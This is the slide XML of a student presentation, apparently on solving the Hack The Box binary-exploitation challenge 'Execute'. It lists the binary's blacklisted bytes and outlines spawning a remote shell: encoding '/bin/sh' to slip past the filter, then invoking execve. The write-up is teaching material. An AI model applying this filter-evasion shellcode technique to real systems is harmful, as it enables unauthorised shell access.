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7" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="356" r:id="rId7"/>
    <p:sldId id="363" r:id="rId8"/>
    <p:sldId id="357" r:id="rId9"/>
    <p:sldId id="358" r:id="rId10"/>
    <p:sldId id="359" r:id="rId11"/>
    <p:sldId id="361" r:id="rId12"/>
    <p:sldId id="362" r:id="rId13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29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5624C8-1613-135E-6EF1-F35ECEBF5012}" v="126" dt="2025-04-25T05:53:21.153"/>
    <p1510:client id="{6F9B62A4-E14F-E72C-8714-E89430BE08A1}" v="91" dt="2025-04-25T22:45:41.7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59"/>
        <p:guide pos="291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en-US" sz="1200" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="12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1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Challenge Catetory: PWN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pwn challenges are about binary-exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Given a vulnerable binary to analyze locally and try to spawn a shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>The main goal is to be able to spawn a shell remotely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At the top,  build the remote connection to the HTB server with PWN tools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At the bottom, it shows that we gain the access to the /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> shell and able to run "cat flag.txt" to retrieve the flag, which we submitted to HTB to resolve the challenge.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251448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1905000"/>
            <a:ext cx="9009063" cy="1052513"/>
            <a:chOff x="0" y="1536"/>
            <a:chExt cx="5675" cy="663"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2053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NZ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NZ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054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NZ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NZ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NZ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NZ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NZ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532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1430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32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53340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53340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95567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95567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88265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42545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21602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8524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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1524000"/>
            <a:ext cx="8650288" cy="46085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22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4 Feb 2004</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522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CS 3243 - Constraint Satisfaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522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>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US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>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" kern="1200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" kern="1200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Project Execute (HTB)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>
          <a:xfrm>
            <a:off x="1371600" y="3352800"/>
            <a:ext cx="6400800" cy="29083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SzPct val="60000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CSCE 5552 Spring 2025</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buSzPct val="60000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" kern="1200">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buSzPct val="60000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" kern="1200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Harry Fu, Hollie King</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buSzPct val="60000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" kern="1200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Tanesha Hollingshed, Tayiba Raheem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buSzPct val="60000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" kern="12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 hidden="1"/>
          <p:cNvSpPr txBox="1"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4 Feb 2004</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Footer Placeholder 4" hidden="1"/>
          <p:cNvSpPr txBox="1"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CS 3243 - Constraint Satisfaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Slide Number Placeholder 5" hidden="1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7038975" y="6223000"/>
            <a:ext cx="1905000" cy="4572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  <a:t>2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/>
              <a:t>HTB Challenge: Execute</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6150" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293688" y="1524000"/>
            <a:ext cx="8650287" cy="4608513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/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>HTB Execute screen shot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Very little information available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Download 3 files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057400"/>
            <a:ext cx="4961255" cy="24758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4572000"/>
            <a:ext cx="2689225" cy="790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5791200"/>
            <a:ext cx="3962400" cy="4476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 hidden="1"/>
          <p:cNvSpPr txBox="1"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4 Feb 2004</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Footer Placeholder 4" hidden="1"/>
          <p:cNvSpPr txBox="1"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CS 3243 - Constraint Satisfaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Slide Number Placeholder 5" hidden="1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7038975" y="6223000"/>
            <a:ext cx="1905000" cy="4572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  <a:t>3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/>
              <a:t>Source File and Behavior</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6150" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75883" y="1524000"/>
            <a:ext cx="8650287" cy="4608513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/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C Source code for exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>blacklist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>read, buf[] - size 60</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>check()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>if character in blacklist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Normal commands filtered with automatic exit</a:t>
            </a:r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295400"/>
            <a:ext cx="2925445" cy="3288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738" y="5070335"/>
            <a:ext cx="525780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FCB13-0D0C-8D69-5560-8E7A1922E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 hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EF1EC91-758D-C49F-A285-540CCF3E067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4 Feb 2004</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Footer Placeholder 4" hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97F228D0-1583-27A9-34FC-F2C9D6B26C3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CS 3243 - Constraint Satisfaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Slide Number Placeholder 5" hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87A0C7E1-B092-D637-78B6-F57E6D0469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038975" y="6223000"/>
            <a:ext cx="1905000" cy="4572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  <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6149" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB5E884A-BCE2-A49F-F20D-3DF010C8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/>
              <a:t>Goal and Long String Test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A computer screen shot of a computer program&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69475091-4B7B-8F87-A787-C191B459A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35" y="1026932"/>
            <a:ext cx="3538018" cy="1370144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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83A9805-4F58-CC28-1C13-CCC0E1A4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246" r="161" b="5911"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="379063" y="2435736"/>
            <a:ext cx="4931937" cy="4426158"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7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8F9417FD-9E10-7A37-BA60-B547A70DA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726" y="1077073"/>
            <a:ext cx="4927420" cy="293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6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 hidden="1"/>
          <p:cNvSpPr txBox="1"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4 Feb 2004</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Footer Placeholder 4" hidden="1"/>
          <p:cNvSpPr txBox="1"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CS 3243 - Constraint Satisfaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Slide Number Placeholder 5" hidden="1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7038975" y="6223000"/>
            <a:ext cx="1905000" cy="4572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  <a:t>5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/>
              <a:t>Goal and Long String Test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6150" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75883" y="1524000"/>
            <a:ext cx="8650287" cy="4608513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/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>The Goal is to submit the flag to HTB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Local flag.txt for testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:ea typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Remote flag.txt is the target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:ea typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Local test – Long String</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:ea typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Notice the read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t> size is 60.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:ea typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Adding “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>” after 60 chars? Can we access the shell?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:ea typeface="Tahoma"/>
              <a:cs typeface="Tahom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20" y="4842701"/>
            <a:ext cx="5024084" cy="1614675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangles 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6529924" y="5256136"/>
            <a:ext cx="241804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7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 hidden="1"/>
          <p:cNvSpPr txBox="1"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4 Feb 2004</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Footer Placeholder 4" hidden="1"/>
          <p:cNvSpPr txBox="1"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CS 3243 - Constraint Satisfaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Slide Number Placeholder 5" hidden="1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7038975" y="6223000"/>
            <a:ext cx="1905000" cy="4572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  <a:t>6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/>
              <a:t>Apply Long String to Remote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30D5E92-D2D5-8CC7-76AC-D07934679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03" y="1363352"/>
            <a:ext cx="8804595" cy="86691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EDF2E6-2FCD-0E68-F054-207F8DC7E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66" y="3626756"/>
            <a:ext cx="4270321" cy="19403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EFA3CC-F165-ADCA-0795-0E387AD958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94" y="2413049"/>
            <a:ext cx="8696325" cy="1133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5D541C-1E5C-EBC3-6FB1-E42C9E2593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849" y="4732344"/>
            <a:ext cx="5384413" cy="19453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 hidden="1"/>
          <p:cNvSpPr txBox="1"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4 Feb 2004</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Footer Placeholder 4" hidden="1"/>
          <p:cNvSpPr txBox="1"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CS 3243 - Constraint Satisfaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Slide Number Placeholder 5" hidden="1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7038975" y="6223000"/>
            <a:ext cx="1905000" cy="4572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  <a:t>7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/>
              <a:t>Different Route and Idea</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6150" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1371600"/>
            <a:ext cx="6065520" cy="4608830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/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Revisit the blacklist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"\x3b\x54\x62\x69\x6e\x73\x68\xf6\xd2\xc0\x5f\xc9\x66\x6c\x61\x67"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>The blacklist is mainly targeting “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>” and “flag”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:ea typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0x3b for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:ea typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US"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2209800"/>
            <a:ext cx="1969135" cy="2663825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="4724400"/>
            <a:ext cx="8977630" cy="17602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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Solution idea - shell  ASM code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Encode “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>” to get around filter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:ea typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Decode with key to retrieve “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:ea typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Trigger system call - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:ea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 hidden="1"/>
          <p:cNvSpPr txBox="1"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4 Feb 2004</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Footer Placeholder 4" hidden="1"/>
